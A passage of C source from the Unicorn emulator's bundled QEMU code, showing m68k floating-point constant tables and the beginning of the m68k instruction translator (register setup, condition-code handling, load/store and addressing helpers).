make_floatx80_init(0x3FFF, 0xBD08A39F580C36BF), make_floatx80_init(0x3FFF, 0xBF1799B67A731083), make_floatx80_init(0x3FFF, 0xC12C4CCA66709456), make_floatx80_init(0x3FFF, 0xC346CCDA24976407), make_floatx80_init(0x3FFF, 0xC5672A115506DADD), make_floatx80_init(0x3FFF, 0xC78D74C8ABB9B15D), make_floatx80_init(0x3FFF, 0xC9B9BD866E2F27A3), make_floatx80_init(0x3FFF, 0xCBEC14FEF2727C5D), make_floatx80_init(0x3FFF, 0xCE248C151F8480E4), make_floatx80_init(0x3FFF, 0xD06333DAEF2B2595), make_floatx80_init(0x3FFF, 0xD2A81D91F12AE45A), make_floatx80_init(0x3FFF, 0xD4F35AABCFEDFA1F), make_floatx80_init(0x3FFF, 0xD744FCCAD69D6AF4), make_floatx80_init(0x3FFF, 0xD99D15C278AFD7B6), make_floatx80_init(0x3FFF, 0xDBFBB797DAF23755), make_floatx80_init(0x3FFF, 0xDE60F4825E0E9124), make_floatx80_init(0x3FFF, 
0xE0CCDEEC2A94E111), make_floatx80_init(0x3FFF, 0xE33F8972BE8A5A51), make_floatx80_init(0x3FFF, 0xE5B906E77C8348A8), make_floatx80_init(0x3FFF, 0xE8396A503C4BDC68), make_floatx80_init(0x3FFF, 0xEAC0C6E7DD24392F), make_floatx80_init(0x3FFF, 0xED4F301ED9942B84), make_floatx80_init(0x3FFF, 0xEFE4B99BDCDAF5CB), make_floatx80_init(0x3FFF, 0xF281773C59FFB13A), make_floatx80_init(0x3FFF, 0xF5257D152486CC2C), make_floatx80_init(0x3FFF, 0xF7D0DF730AD13BB9), make_floatx80_init(0x3FFF, 0xFA83B2DB722A033A), make_floatx80_init(0x3FFF, 0xFD3E0C0CF486C175) }; static const uint32_t exp2_tbl2[64] = { 0x3F738000, 0x3FBEF7CA, 0x3FBDF8A9, 0x3FBCD7C9, 0xBFBDE8DA, 0x3FBDE85C, 0x3FBEBBF1, 0x3FBB80CA, 0xBFBA8373, 0xBFBE9670, 0x3FBDB700, 0x3FBEEEB0, 0x3FBBFD6D, 0xBFBDB319, 0x3FBDBA2B, 0x3FBE91D5, 0x3FBE8D5A, 0xBFBCDE7B, 0xBFBEBAAF, 0xBFBD86DA, 0xBFBEBEDD, 0x3FBCC96E, 0xBFBEC90B, 0x3FBBD1DB, 0x3FBCE5EB, 0xBFBEC274, 0x3FBEA83C, 0x3FBECB00, 0x3FBE9301, 0xBFBD8367, 0xBFBEF05F, 0x3FBDFB3C, 0x3FBEB2FB, 0x3FBAE2CB, 0x3FBCDC3C, 0x3FBEE9AA, 0xBFBEAEFD, 0xBFBCBF51, 0x3FBEF88A, 0x3FBD83B2, 0x3FBDF8AB, 0xBFBDFB17, 0xBFBEFE3C, 0xBFBBB6F8, 0xBFBCEE53, 0xBFBDA4AE, 0x3FBC9124, 0x3FBEB243, 0x3FBDE69A, 0xBFB8BC61, 0x3FBDF610, 0xBFBD8BE1, 0x3FBACB12, 0x3FBB9BFE, 0x3FBCF2F4, 0x3FBEF22F, 0xBFBDBF4A, 0x3FBEC01A, 0x3FBE8CAC, 0xBFBCBB3F, 0x3FBEF73A, 0xBFB8B795, 0x3FBEF84B, 0xBFBEF581 }; static const floatx80 pi_tbl[65] = { make_floatx80_init(0xC004, 0xC90FDAA22168C235), make_floatx80_init(0xC004, 0xC2C75BCD105D7C23), make_floatx80_init(0xC004, 0xBC7EDCF7FF523611), make_floatx80_init(0xC004, 0xB6365E22EE46F000), make_floatx80_init(0xC004, 0xAFEDDF4DDD3BA9EE), make_floatx80_init(0xC004, 0xA9A56078CC3063DD), make_floatx80_init(0xC004, 0xA35CE1A3BB251DCB), make_floatx80_init(0xC004, 0x9D1462CEAA19D7B9), make_floatx80_init(0xC004, 0x96CBE3F9990E91A8), make_floatx80_init(0xC004, 0x9083652488034B96), make_floatx80_init(0xC004, 0x8A3AE64F76F80584), make_floatx80_init(0xC004, 0x83F2677A65ECBF73), make_floatx80_init(0xC003, 0xFB53D14AA9C2F2C2), make_floatx80_init(0xC003, 0xEEC2D3A087AC669F), make_floatx80_init(0xC003, 0xE231D5F66595DA7B), make_floatx80_init(0xC003, 0xD5A0D84C437F4E58), make_floatx80_init(0xC003, 0xC90FDAA22168C235), make_floatx80_init(0xC003, 0xBC7EDCF7FF523611), make_floatx80_init(0xC003, 0xAFEDDF4DDD3BA9EE), make_floatx80_init(0xC003, 0xA35CE1A3BB251DCB), make_floatx80_init(0xC003, 0x96CBE3F9990E91A8), make_floatx80_init(0xC003, 0x8A3AE64F76F80584), make_floatx80_init(0xC002, 0xFB53D14AA9C2F2C2), make_floatx80_init(0xC002, 0xE231D5F66595DA7B), make_floatx80_init(0xC002, 0xC90FDAA22168C235), make_floatx80_init(0xC002, 0xAFEDDF4DDD3BA9EE), make_floatx80_init(0xC002, 0x96CBE3F9990E91A8), make_floatx80_init(0xC001, 0xFB53D14AA9C2F2C2), make_floatx80_init(0xC001, 0xC90FDAA22168C235), make_floatx80_init(0xC001, 0x96CBE3F9990E91A8), make_floatx80_init(0xC000, 0xC90FDAA22168C235), make_floatx80_init(0xBFFF, 0xC90FDAA22168C235), make_floatx80_init(0x0000, 0x0000000000000000), make_floatx80_init(0x3FFF, 0xC90FDAA22168C235), make_floatx80_init(0x4000, 0xC90FDAA22168C235), make_floatx80_init(0x4001, 0x96CBE3F9990E91A8), make_floatx80_init(0x4001, 0xC90FDAA22168C235), make_floatx80_init(0x4001, 0xFB53D14AA9C2F2C2), make_floatx80_init(0x4002, 0x96CBE3F9990E91A8), make_floatx80_init(0x4002, 0xAFEDDF4DDD3BA9EE), make_floatx80_init(0x4002, 0xC90FDAA22168C235), make_floatx80_init(0x4002, 0xE231D5F66595DA7B), make_floatx80_init(0x4002, 0xFB53D14AA9C2F2C2), make_floatx80_init(0x4003, 0x8A3AE64F76F80584), make_floatx80_init(0x4003, 
0x96CBE3F9990E91A8), make_floatx80_init(0x4003, 0xA35CE1A3BB251DCB), make_floatx80_init(0x4003, 0xAFEDDF4DDD3BA9EE), make_floatx80_init(0x4003, 0xBC7EDCF7FF523611), make_floatx80_init(0x4003, 0xC90FDAA22168C235), make_floatx80_init(0x4003, 0xD5A0D84C437F4E58), make_floatx80_init(0x4003, 0xE231D5F66595DA7B), make_floatx80_init(0x4003, 0xEEC2D3A087AC669F), make_floatx80_init(0x4003, 0xFB53D14AA9C2F2C2), make_floatx80_init(0x4004, 0x83F2677A65ECBF73), make_floatx80_init(0x4004, 0x8A3AE64F76F80584), make_floatx80_init(0x4004, 0x9083652488034B96), make_floatx80_init(0x4004, 0x96CBE3F9990E91A8), make_floatx80_init(0x4004, 0x9D1462CEAA19D7B9), make_floatx80_init(0x4004, 0xA35CE1A3BB251DCB), make_floatx80_init(0x4004, 0xA9A56078CC3063DD), make_floatx80_init(0x4004, 0xAFEDDF4DDD3BA9EE), make_floatx80_init(0x4004, 0xB6365E22EE46F000), make_floatx80_init(0x4004, 0xBC7EDCF7FF523611), make_floatx80_init(0x4004, 0xC2C75BCD105D7C23), make_floatx80_init(0x4004, 0xC90FDAA22168C235) }; static const float32 pi_tbl2[65] = { const_float32(0x21800000), const_float32(0xA0D00000), const_float32(0xA1E80000), const_float32(0x21480000), const_float32(0xA1200000), const_float32(0x21FC0000), const_float32(0x21100000), const_float32(0xA1580000), const_float32(0x21E00000), const_float32(0x20B00000), const_float32(0xA1880000), const_float32(0x21C40000), const_float32(0x20000000), const_float32(0x21380000), const_float32(0xA1300000), const_float32(0x9FC00000), const_float32(0x21000000), const_float32(0xA1680000), const_float32(0xA0A00000), const_float32(0x20900000), const_float32(0x21600000), const_float32(0xA1080000), const_float32(0x1F800000), const_float32(0xA0B00000), const_float32(0x20800000), const_float32(0xA0200000), const_float32(0x20E00000), const_float32(0x1F000000), const_float32(0x20000000), const_float32(0x20600000), const_float32(0x1F800000), const_float32(0x1F000000), const_float32(0x00000000), const_float32(0x9F000000), const_float32(0x9F800000), const_float32(0xA0600000), const_float32(0xA0000000), const_float32(0x9F000000), const_float32(0xA0E00000), const_float32(0x20200000), const_float32(0xA0800000), const_float32(0x20B00000), const_float32(0x9F800000), const_float32(0x21080000), const_float32(0xA1600000), const_float32(0xA0900000), const_float32(0x20A00000), const_float32(0x21680000), const_float32(0xA1000000), const_float32(0x1FC00000), const_float32(0x21300000), const_float32(0xA1380000), const_float32(0xA0000000), const_float32(0xA1C40000), const_float32(0x21880000), const_float32(0xA0B00000), const_float32(0xA1E00000), const_float32(0x21580000), const_float32(0xA1100000), const_float32(0xA1FC0000), const_float32(0x21200000), const_float32(0xA1480000), const_float32(0x21E80000), const_float32(0x20D00000), const_float32(0xA1800000), }; static const floatx80 atan_tbl[128] = { make_floatx80_init(0x3FFB, 0x83D152C5060B7A51), make_floatx80_init(0x3FFB, 0x8BC8544565498B8B), make_floatx80_init(0x3FFB, 0x93BE406017626B0D), make_floatx80_init(0x3FFB, 0x9BB3078D35AEC202), make_floatx80_init(0x3FFB, 0xA3A69A525DDCE7DE), make_floatx80_init(0x3FFB, 0xAB98E94362765619), make_floatx80_init(0x3FFB, 0xB389E502F9C59862), make_floatx80_init(0x3FFB, 0xBB797E436B09E6FB), make_floatx80_init(0x3FFB, 0xC367A5C739E5F446), make_floatx80_init(0x3FFB, 0xCB544C61CFF7D5C6), make_floatx80_init(0x3FFB, 0xD33F62F82488533E), make_floatx80_init(0x3FFB, 0xDB28DA8162404C77), make_floatx80_init(0x3FFB, 0xE310A4078AD34F18), make_floatx80_init(0x3FFB, 0xEAF6B0A8188EE1EB), make_floatx80_init(0x3FFB, 0xF2DAF1949DBE79D5), 
make_floatx80_init(0x3FFB, 0xFABD581361D47E3E), make_floatx80_init(0x3FFC, 0x8346AC210959ECC4), make_floatx80_init(0x3FFC, 0x8B232A08304282D8), make_floatx80_init(0x3FFC, 0x92FB70B8D29AE2F9), make_floatx80_init(0x3FFC, 0x9ACF476F5CCD1CB4), make_floatx80_init(0x3FFC, 0xA29E76304954F23F), make_floatx80_init(0x3FFC, 0xAA68C5D08AB85230), make_floatx80_init(0x3FFC, 0xB22DFFFD9D539F83), make_floatx80_init(0x3FFC, 0xB9EDEF453E900EA5), make_floatx80_init(0x3FFC, 0xC1A85F1CC75E3EA5), make_floatx80_init(0x3FFC, 0xC95D1BE828138DE6), make_floatx80_init(0x3FFC, 0xD10BF300840D2DE4), make_floatx80_init(0x3FFC, 0xD8B4B2BA6BC05E7A), make_floatx80_init(0x3FFC, 0xE0572A6BB42335F6), make_floatx80_init(0x3FFC, 0xE7F32A70EA9CAA8F), make_floatx80_init(0x3FFC, 0xEF88843264ECEFAA), make_floatx80_init(0x3FFC, 0xF7170A28ECC06666), make_floatx80_init(0x3FFD, 0x812FD288332DAD32), make_floatx80_init(0x3FFD, 0x88A8D1B1218E4D64), make_floatx80_init(0x3FFD, 0x9012AB3F23E4AEE8), make_floatx80_init(0x3FFD, 0x976CC3D411E7F1B9), make_floatx80_init(0x3FFD, 0x9EB689493889A227), make_floatx80_init(0x3FFD, 0xA5EF72C34487361B), make_floatx80_init(0x3FFD, 0xAD1700BAF07A7227), make_floatx80_init(0x3FFD, 0xB42CBCFAFD37EFB7), make_floatx80_init(0x3FFD, 0xBB303A940BA80F89), make_floatx80_init(0x3FFD, 0xC22115C6FCAEBBAF), make_floatx80_init(0x3FFD, 0xC8FEF3E686331221), make_floatx80_init(0x3FFD, 0xCFC98330B4000C70), make_floatx80_init(0x3FFD, 0xD6807AA1102C5BF9), make_floatx80_init(0x3FFD, 0xDD2399BC31252AA3), make_floatx80_init(0x3FFD, 0xE3B2A8556B8FC517), make_floatx80_init(0x3FFD, 0xEA2D764F64315989), make_floatx80_init(0x3FFD, 0xF3BF5BF8BAD1A21D), make_floatx80_init(0x3FFE, 0x801CE39E0D205C9A), make_floatx80_init(0x3FFE, 0x8630A2DADA1ED066), make_floatx80_init(0x3FFE, 0x8C1AD445F3E09B8C), make_floatx80_init(0x3FFE, 0x91DB8F1664F350E2), make_floatx80_init(0x3FFE, 0x97731420365E538C), make_floatx80_init(0x3FFE, 0x9CE1C8E6A0B8CDBA), make_floatx80_init(0x3FFE, 0xA22832DBCADAAE09), make_floatx80_init(0x3FFE, 0xA746F2DDB7602294), make_floatx80_init(0x3FFE, 0xAC3EC0FB997DD6A2), make_floatx80_init(0x3FFE, 0xB110688AEBDC6F6A), make_floatx80_init(0x3FFE, 0xB5BCC49059ECC4B0), make_floatx80_init(0x3FFE, 0xBA44BC7DD470782F), make_floatx80_init(0x3FFE, 0xBEA94144FD049AAC), make_floatx80_init(0x3FFE, 0xC2EB4ABB661628B6), make_floatx80_init(0x3FFE, 0xC70BD54CE602EE14), make_floatx80_init(0x3FFE, 0xCD000549ADEC7159), make_floatx80_init(0x3FFE, 0xD48457D2D8EA4EA3), make_floatx80_init(0x3FFE, 0xDB948DA712DECE3B), make_floatx80_init(0x3FFE, 0xE23855F969E8096A), make_floatx80_init(0x3FFE, 0xE8771129C4353259), make_floatx80_init(0x3FFE, 0xEE57C16E0D379C0D), make_floatx80_init(0x3FFE, 0xF3E10211A87C3779), make_floatx80_init(0x3FFE, 0xF919039D758B8D41), make_floatx80_init(0x3FFE, 0xFE058B8F64935FB3), make_floatx80_init(0x3FFF, 0x8155FB497B685D04), make_floatx80_init(0x3FFF, 0x83889E3549D108E1), make_floatx80_init(0x3FFF, 0x859CFA76511D724B), make_floatx80_init(0x3FFF, 0x87952ECFFF8131E7), make_floatx80_init(0x3FFF, 0x89732FD19557641B), make_floatx80_init(0x3FFF, 0x8B38CAD101932A35), make_floatx80_init(0x3FFF, 0x8CE7A8D8301EE6B5), make_floatx80_init(0x3FFF, 0x8F46A39E2EAE5281), make_floatx80_init(0x3FFF, 0x922DA7D791888487), make_floatx80_init(0x3FFF, 0x94D19FCBDEDF5241), make_floatx80_init(0x3FFF, 0x973AB94419D2A08B), make_floatx80_init(0x3FFF, 0x996FF00E08E10B96), make_floatx80_init(0x3FFF, 0x9B773F9512321DA7), make_floatx80_init(0x3FFF, 0x9D55CC320F935624), make_floatx80_init(0x3FFF, 0x9F100575006CC571), make_floatx80_init(0x3FFF, 0xA0A9C290D97CC06C), 
make_floatx80_init(0x3FFF, 0xA22659EBEBC0630A), make_floatx80_init(0x3FFF, 0xA388B4AFF6EF0EC9), make_floatx80_init(0x3FFF, 0xA4D35F1061D292C4), make_floatx80_init(0x3FFF, 0xA60895DCFBE3187E), make_floatx80_init(0x3FFF, 0xA72A51DC7367BEAC), make_floatx80_init(0x3FFF, 0xA83A51530956168F), make_floatx80_init(0x3FFF, 0xA93A20077539546E), make_floatx80_init(0x3FFF, 0xAA9E7245023B2605), make_floatx80_init(0x3FFF, 0xAC4C84BA6FE4D58F), make_floatx80_init(0x3FFF, 0xADCE4A4A606B9712), make_floatx80_init(0x3FFF, 0xAF2A2DCD8D263C9C), make_floatx80_init(0x3FFF, 0xB0656F81F22265C7), make_floatx80_init(0x3FFF, 0xB18465150F71496A), make_floatx80_init(0x3FFF, 0xB28AAA156F9ADA35), make_floatx80_init(0x3FFF, 0xB37B44FF3766B895), make_floatx80_init(0x3FFF, 0xB458C3DCE9630433), make_floatx80_init(0x3FFF, 0xB525529D562246BD), make_floatx80_init(0x3FFF, 0xB5E2CCA95F9D88CC), make_floatx80_init(0x3FFF, 0xB692CADA7ACA1ADA), make_floatx80_init(0x3FFF, 0xB736AEA7A6925838), make_floatx80_init(0x3FFF, 0xB7CFAB287E9F7B36), make_floatx80_init(0x3FFF, 0xB85ECC66CB219835), make_floatx80_init(0x3FFF, 0xB8E4FD5A20A593DA), make_floatx80_init(0x3FFF, 0xB99F41F64AFF9BB5), make_floatx80_init(0x3FFF, 0xBA7F1E17842BBE7B), make_floatx80_init(0x3FFF, 0xBB4712857637E17D), make_floatx80_init(0x3FFF, 0xBBFABE8A4788DF6F), make_floatx80_init(0x3FFF, 0xBC9D0FAD2B689D79), make_floatx80_init(0x3FFF, 0xBD306A39471ECD86), make_floatx80_init(0x3FFF, 0xBDB6C731856AF18A), make_floatx80_init(0x3FFF, 0xBE31CAC502E80D70), make_floatx80_init(0x3FFF, 0xBEA2D55CE33194E2), make_floatx80_init(0x3FFF, 0xBF0B10B7C03128F0), make_floatx80_init(0x3FFF, 0xBF6B7A18DACB778D), make_floatx80_init(0x3FFF, 0xBFC4EA4663FA18F6), make_floatx80_init(0x3FFF, 0xC0181BDE8B89A454), make_floatx80_init(0x3FFF, 0xC065B066CFBF6439), make_floatx80_init(0x3FFF, 0xC0AE345F56340AE6), make_floatx80_init(0x3FFF, 0xC0F222919CB9E6A7) }; #endif
unicorn-2.1.1/qemu/target/m68k/translate.c
/* * m68k translation * * Copyright (c) 2005-2007 CodeSourcery * Written by Paul Brook * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. 
*/ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "tcg/tcg-op.h" #include "exec/cpu_ldst.h" #include "exec/translator.h" #include "exec/helper-proto.h" #include "exec/helper-gen.h" #include "fpu/softfloat.h" //#define DEBUG_DISPATCH 1 #define DEFO32(name, offset) static TCGv QREG_##name; #define DEFO64(name, offset) static TCGv_i64 QREG_##name; #include "qregs.def" #undef DEFO32 #undef DEFO64 #define REG(insn, pos) (((insn) >> (pos)) & 7) #define DREG(insn, pos) tcg_ctx->cpu_dregs[REG(insn, pos)] #define AREG(insn, pos) get_areg(s, REG(insn, pos)) #define MACREG(acc) tcg_ctx->cpu_macc[acc] #define QREG_SP get_areg(s, 7) #define IS_NULL_QREG(t) (t == tcg_ctx->NULL_QREG) #include "exec/gen-icount.h" void m68k_tcg_init(struct uc_struct *uc) { TCGContext *tcg_ctx = uc->tcg_ctx; char *p; int i; #define DEFO32(name, offset) \ QREG_##name = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, \ offsetof(CPUM68KState, offset), #name); #define DEFO64(name, offset) \ QREG_##name = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, \ offsetof(CPUM68KState, offset), #name); #include "qregs.def" #undef DEFO32 #undef DEFO64 tcg_ctx->cpu_halted = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, #ifdef _MSC_VER 0 - offsetof(M68kCPU, env) + #else -offsetof(M68kCPU, env) + #endif offsetof(CPUState, halted), "HALTED"); tcg_ctx->cpu_exception_index = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, #ifdef _MSC_VER 0 - offsetof(M68kCPU, env) + #else -offsetof(M68kCPU, env) + #endif offsetof(CPUState, exception_index), "EXCEPTION"); p = tcg_ctx->cpu_reg_names; for (i = 0; i < 8; i++) { sprintf(p, "D%d", i); tcg_ctx->cpu_dregs[i] = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUM68KState, dregs[i]), p); p += 3; sprintf(p, "A%d", i); tcg_ctx->cpu_aregs[i] = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUM68KState, aregs[i]), p); p += 3; } for (i = 0; i < 4; i++) { sprintf(p, "ACC%d", i); tcg_ctx->cpu_macc[i] = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUM68KState, macc[i]), p); p += 5; } tcg_ctx->NULL_QREG = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, -4, "NULL"); tcg_ctx->store_dummy = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, -8, "NULL"); } /* internal defines */ typedef struct DisasContext { DisasContextBase base; CPUM68KState *env; target_ulong pc; CCOp cc_op; /* Current CC operation */ int cc_op_synced; TCGv_i64 mactmp; int done_mac; int writeback_mask; TCGv writeback[8]; #define MAX_TO_RELEASE 8 int release_count; TCGv release[MAX_TO_RELEASE]; // Unicorn struct uc_struct *uc; } DisasContext; static void init_release_array(DisasContext *s) { #ifdef CONFIG_DEBUG_TCG memset(s->release, 0, sizeof(s->release)); #endif s->release_count = 0; } static void do_release(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int i; for (i = 0; i < s->release_count; i++) { tcg_temp_free(tcg_ctx, s->release[i]); } init_release_array(s); } static TCGv mark_to_release(DisasContext *s, TCGv tmp) { g_assert(s->release_count < MAX_TO_RELEASE); return s->release[s->release_count++] = tmp; } static TCGv get_areg(DisasContext *s, unsigned regno) { if (s->writeback_mask & (1 << regno)) { return s->writeback[regno]; } else { TCGContext *tcg_ctx = s->uc->tcg_ctx; return tcg_ctx->cpu_aregs[regno]; } } static void delay_set_areg(DisasContext *s, unsigned regno, TCGv val, bool give_temp) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (s->writeback_mask & (1 << regno)) { if (give_temp) { tcg_temp_free(tcg_ctx, s->writeback[regno]); s->writeback[regno] = val; } else 
{ tcg_gen_mov_i32(tcg_ctx, s->writeback[regno], val); } } else { s->writeback_mask |= 1 << regno; if (give_temp) { s->writeback[regno] = val; } else { TCGv tmp = tcg_temp_new(tcg_ctx); s->writeback[regno] = tmp; tcg_gen_mov_i32(tcg_ctx, tmp, val); } } } static void do_writebacks(DisasContext *s) { unsigned mask = s->writeback_mask; if (mask) { TCGContext *tcg_ctx = s->uc->tcg_ctx; s->writeback_mask = 0; do { unsigned regno = ctz32(mask); tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_aregs[regno], s->writeback[regno]); tcg_temp_free(tcg_ctx, s->writeback[regno]); mask &= mask - 1; } while (mask); } } /* is_jmp field values */ #define DISAS_JUMP DISAS_TARGET_0 /* only pc was modified dynamically */ #define DISAS_EXIT DISAS_TARGET_1 /* cpu state was modified dynamically */ #define IS_USER(s) (!(s->base.tb->flags & TB_FLAGS_MSR_S)) #define SFC_INDEX(s) ((s->base.tb->flags & TB_FLAGS_SFC_S) ? \ MMU_KERNEL_IDX : MMU_USER_IDX) #define DFC_INDEX(s) ((s->base.tb->flags & TB_FLAGS_DFC_S) ? \ MMU_KERNEL_IDX : MMU_USER_IDX) typedef void (*disas_proc)(CPUM68KState *env, DisasContext *s, uint16_t insn); #ifdef DEBUG_DISPATCH #define DISAS_INSN(name) \ static void real_disas_##name(CPUM68KState *env, DisasContext *s, \ uint16_t insn); \ static void disas_##name(CPUM68KState *env, DisasContext *s, \ uint16_t insn) \ { \ qemu_log("Dispatch " #name "\n"); \ real_disas_##name(env, s, insn); \ } \ static void real_disas_##name(CPUM68KState *env, DisasContext *s, \ uint16_t insn) #else #define DISAS_INSN(name) \ static void disas_##name(CPUM68KState *env, DisasContext *s, \ uint16_t insn) #endif static const uint8_t cc_op_live[CC_OP_NB] = { [CC_OP_DYNAMIC] = CCF_C | CCF_V | CCF_Z | CCF_N | CCF_X, [CC_OP_FLAGS] = CCF_C | CCF_V | CCF_Z | CCF_N | CCF_X, [CC_OP_ADDB] = CCF_X | CCF_N | CCF_V, [CC_OP_ADDW] = CCF_X | CCF_N | CCF_V, [CC_OP_ADDL] = CCF_X | CCF_N | CCF_V, [CC_OP_SUBB] = CCF_X | CCF_N | CCF_V, [CC_OP_SUBW] = CCF_X | CCF_N | CCF_V, [CC_OP_SUBL] = CCF_X | CCF_N | CCF_V, [CC_OP_CMPB] = CCF_X | CCF_N | CCF_V, [CC_OP_CMPW] = CCF_X | CCF_N | CCF_V, [CC_OP_CMPL] = CCF_X | CCF_N | CCF_V, [CC_OP_LOGIC] = CCF_X | CCF_N }; static void set_cc_op(DisasContext *s, CCOp op) { TCGContext *tcg_ctx = s->uc->tcg_ctx; CCOp old_op = s->cc_op; int dead; if (old_op == op) { return; } s->cc_op = op; s->cc_op_synced = 0; /* * Discard CC computation that will no longer be used. * Note that X and N are never dead. */ dead = cc_op_live[old_op] & ~cc_op_live[op]; if (dead & CCF_C) { tcg_gen_discard_i32(tcg_ctx, QREG_CC_C); } if (dead & CCF_Z) { tcg_gen_discard_i32(tcg_ctx, QREG_CC_Z); } if (dead & CCF_V) { tcg_gen_discard_i32(tcg_ctx, QREG_CC_V); } } /* Update the CPU env CC_OP state. */ static void update_cc_op(DisasContext *s) { if (!s->cc_op_synced) { TCGContext *tcg_ctx = s->uc->tcg_ctx; s->cc_op_synced = 1; tcg_gen_movi_i32(tcg_ctx, QREG_CC_OP, s->cc_op); } } /* Generate a jump to an immediate address. */ static void gen_jmp_im(DisasContext *s, uint32_t dest) { TCGContext *tcg_ctx = s->uc->tcg_ctx; update_cc_op(s); tcg_gen_movi_i32(tcg_ctx, QREG_PC, dest); s->base.is_jmp = DISAS_JUMP; } /* Generate a jump to the address in qreg DEST. 
*/ static void gen_jmp(DisasContext *s, TCGv dest) { TCGContext *tcg_ctx = s->uc->tcg_ctx; update_cc_op(s); tcg_gen_mov_i32(tcg_ctx, QREG_PC, dest); s->base.is_jmp = DISAS_JUMP; } static void gen_raise_exception(TCGContext *tcg_ctx, int nr) { TCGv_i32 tmp; tmp = tcg_const_i32(tcg_ctx, nr); gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, tmp); tcg_temp_free_i32(tcg_ctx, tmp); } static void gen_exception(DisasContext *s, uint32_t dest, int nr) { TCGContext *tcg_ctx = s->uc->tcg_ctx; update_cc_op(s); tcg_gen_movi_i32(tcg_ctx, QREG_PC, dest); gen_raise_exception(tcg_ctx, nr); s->base.is_jmp = DISAS_NORETURN; } static inline void gen_addr_fault(DisasContext *s) { gen_exception(s, s->base.pc_next, EXCP_ADDRESS); } /* * Generate a load from the specified address. Narrow values are * sign extended to full register width. */ static inline TCGv gen_load(DisasContext *s, int opsize, TCGv addr, int sign, int index) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv tmp; tmp = tcg_temp_new_i32(tcg_ctx); switch(opsize) { case OS_BYTE: if (sign) tcg_gen_qemu_ld8s(tcg_ctx, tmp, addr, index); else tcg_gen_qemu_ld8u(tcg_ctx, tmp, addr, index); break; case OS_WORD: if (sign) tcg_gen_qemu_ld16s(tcg_ctx, tmp, addr, index); else tcg_gen_qemu_ld16u(tcg_ctx, tmp, addr, index); break; case OS_LONG: tcg_gen_qemu_ld32u(tcg_ctx, tmp, addr, index); break; default: g_assert_not_reached(); } return tmp; } /* Generate a store. */ static inline void gen_store(DisasContext *s, int opsize, TCGv addr, TCGv val, int index) { TCGContext *tcg_ctx = s->uc->tcg_ctx; switch(opsize) { case OS_BYTE: tcg_gen_qemu_st8(tcg_ctx, val, addr, index); break; case OS_WORD: tcg_gen_qemu_st16(tcg_ctx, val, addr, index); break; case OS_LONG: tcg_gen_qemu_st32(tcg_ctx, val, addr, index); break; default: g_assert_not_reached(); } } typedef enum { EA_STORE, EA_LOADU, EA_LOADS } ea_what; /* * Generate an unsigned load if WHAT is EA_LOADU, a signed load if WHAT * is EA_LOADS, otherwise generate a store. */ static TCGv gen_ldst(DisasContext *s, int opsize, TCGv addr, TCGv val, ea_what what, int index) { if (what == EA_STORE) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_store(s, opsize, addr, val, index); return tcg_ctx->store_dummy; } else { return mark_to_release(s, gen_load(s, opsize, addr, what == EA_LOADS, index)); } } /* Read a 16-bit immediate constant */ static inline uint16_t read_im16(CPUM68KState *env, DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint16_t im; im = translator_lduw(tcg_ctx, env, s->pc); s->pc += 2; return im; } /* Read an 8-bit immediate constant */ static inline uint8_t read_im8(CPUM68KState *env, DisasContext *s) { return read_im16(env, s); } /* Read a 32-bit immediate constant. */ static inline uint32_t read_im32(CPUM68KState *env, DisasContext *s) { uint32_t im; im = read_im16(env, s) << 16; im |= 0xffff & read_im16(env, s); return im; } /* Read a 64-bit immediate constant. */ static inline uint64_t read_im64(CPUM68KState *env, DisasContext *s) { uint64_t im; im = (uint64_t)read_im32(env, s) << 32; im |= (uint64_t)read_im32(env, s); return im; } /* Calculate an address index. */ static TCGv gen_addr_index(DisasContext *s, uint16_t ext, TCGv tmp) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv add; int scale; add = (ext & 0x8000) ? AREG(ext, 12) : DREG(ext, 12); if ((ext & 0x800) == 0) { tcg_gen_ext16s_i32(tcg_ctx, tmp, add); add = tmp; } scale = (ext >> 9) & 3; if (scale != 0) { tcg_gen_shli_i32(tcg_ctx, tmp, add, scale); add = tmp; } return add; } /* * Handle a base + index + displacement effective address. 
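* Roughly, the brief extension word decoded by gen_addr_index is laid * out as: bit 15 = D/A (index in a data or address register), bits * 14-12 = index register number, bit 11 = W/L (0 = sign-extended word * index, 1 = long index), bits 10-9 = scale (68020+; forced to 0 on * earlier parts above), bit 8 = 0 for brief / 1 for full format, bits * 7-0 = signed 8-bit displacement (brief format only). 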
